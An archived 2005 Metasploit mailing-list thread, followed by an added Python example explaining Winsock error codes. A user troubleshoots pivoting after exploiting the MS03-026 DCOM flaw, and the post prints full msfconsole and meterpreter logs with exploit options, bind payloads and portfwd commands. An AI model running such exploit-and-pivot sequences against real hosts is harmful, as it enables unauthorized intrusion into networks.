Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Tue, 19 Apr 2005 08:05:23 +0200
I just rechecked the vulnerability of the host to be sure I don't have an invulnerable host. So I'm now using the former proxy host as the target host and a new vulnerable host as the proxy host. Now I get an error 11001. Here's the log:

+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.185
RHOST -> 10.10.10.185
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default       Description
  --------    ------    ------------  ------------------
  required    RHOST     10.10.10.185  The target address
  required    RPORT     135           The target port

  Payload:    Name      Default                                      Description
  --------    --------  -------------------------------------------  -----------------------------------
  required    EXITFUNC  thread                                       Exit technique: "process", "thread", "seh"
  required    METDLL    /home/framework/data/meterpreter/metsrv.dll  The full path the meterpreter server dll
  required    LPORT     4444                                         Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x92ca
[*] Got connection from 10.10.10.56:1156 <-> 10.10.10.185:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]

meterpreter> use -m Net
loadlib: Loading library from 'ext699020.dll' on the remote machine.
meterpreter>
loadlib: success.

meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.88 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.88 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:
   127.0.0.1:9000 <-> 10.10.10.88:135
   127.0.0.1:4444 <-> 10.10.10.88:4444
meterpreter>
open_tcp_channel: failure, 11001.
meterpreter>

------------ second shell : --------------

+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name    Default    Description
  --------    ------  ---------  ------------------
  required    RHOST   127.0.0.1  The target address
  required    RPORT   9000       The target port

  Payload:    Name      Default  Description
  --------    --------  -------  ------------------------------------------
  required    EXITFUNC  thread   Exit technique: "process", "thread", "seh"
  required    LPORT     4444     Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:1221 <-> 127.0.0.1:4444
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) >

mmiller at hick.org wrote:
> On Mon, Apr 18, 2005 at 10:07:48AM +0200, Thomas Werth wrote:
> > > Does the bind handler ever say it established the connection? Does it
> > > say this before or after the 'Connected to REMACT'? If it says that the
> > > bind handler has established the connection before the 'REMACT' line
> > > then you may have created the port forward too soon. Can you include
> > > the full output from the exploit command?
> >
> > The bind handler doesn't say it establishes a connection. I just saw that
> > on the meterpreter window an error is thrown up: open_tcp_channel:
> > failure, 10061.
>
> The above error code indicates why it's not working. 10061 is
> WSACONNREFUSED. This means that when the meterpreter server instance
> attempted to connect to 10.10.10.77 on port 135 (or 4444 depending on the
> stage), the connection was refused. This is probably indicative of the fact
> that the exploit did not work against the machine that you are attempting to
> target. Are you certain that it's vulnerable?
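The pattern in the second console, where the local bind handler prints "Got connection" and then immediately exits while the meterpreter window reports an open_tcp_channel failure, is a general property of any port-forward relay: the local accept() succeeds regardless of the forward target, and only the upstream connect reveals the real state of the target. The following is an added example, not code from the thread or from Metasploit; it is a minimal loopback relay that classifies the upstream failure into the two outcomes discussed here (connection refused, Winsock 10061, and host not found, Winsock 11001). The ForwardResult type, the function names and the loopback "targets" it builds are this example's own assumptions.

```python
import socket
from dataclasses import dataclass
from typing import Optional, Tuple

# Winsock codes named in the thread. The mapping from the POSIX exceptions a
# Unix-side relay raises to these codes is this example's own construction.
WSAECONNREFUSED = 10061    # "10061 is WSACONNREFUSED" in mmiller's reply
WSAHOST_NOT_FOUND = 11001  # the "error 11001" in the second attempt


@dataclass
class ForwardResult:
    """Outcome of one relayed connection (type is this example's own)."""
    local_accepted: bool         # the local listener handed us a client
    upstream_ok: bool            # the forward target accepted the connect
    winsock_code: Optional[int]  # equivalent Winsock code if upstream failed
    diagnosis: str


def connect_upstream(host: str, port: int, timeout: float = 2.0
                     ) -> Tuple[Optional[socket.socket], Optional[int], str]:
    """Try the forward leg and classify a failure the way the thread does."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
        return sock, None, "forward target accepted the connection"
    except socket.gaierror:
        # Name resolution failed on the relay host: Winsock reports 11001.
        return None, WSAHOST_NOT_FOUND, "forward target name could not be resolved"
    except ConnectionRefusedError:
        # RST from the target: nothing listens on that port (service not up).
        return None, WSAECONNREFUSED, "nothing is listening on the forward target port"
    except OSError as exc:
        return None, None, f"upstream connect failed: {exc}"


def relay_one_connection(target_host: str, target_port: int) -> ForwardResult:
    """Open a loopback listener, connect a client to it, then try upstream.

    accept() always succeeds here because the listener is local; that is why
    a bind handler pointed at a local port forward prints 'Got connection'
    even when the forward target is unreachable.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    local_port = listener.getsockname()[1]

    client = socket.create_connection(("127.0.0.1", local_port))
    conn, _ = listener.accept()
    try:
        upstream, code, why = connect_upstream(target_host, target_port)
        if upstream is None:
            return ForwardResult(True, False, code, why)
        upstream.close()
        return ForwardResult(True, True, None, why)
    finally:
        conn.close()
        client.close()
        listener.close()


def closed_loopback_port() -> int:
    """Find a loopback port with no listener (constructed 'dead target')."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


def listening_loopback_target() -> Tuple[socket.socket, int]:
    """Stand up a loopback listener to play a forward target that is up."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    dead = relay_one_connection("127.0.0.1", closed_loopback_port())
    print(f"closed target: winsock {dead.winsock_code}: {dead.diagnosis}")
    srv, port = listening_loopback_target()
    alive = relay_one_connection("127.0.0.1", port)
    srv.close()
    print(f"live target: upstream_ok={alive.upstream_ok}: {alive.diagnosis}")
```

Run against the closed loopback port the relay reports local_accepted=True with winsock_code 10061, which is the same signal mmiller reads from the meterpreter window: the local leg tells you nothing about the target, the refused upstream connect tells you the port on the target is not open.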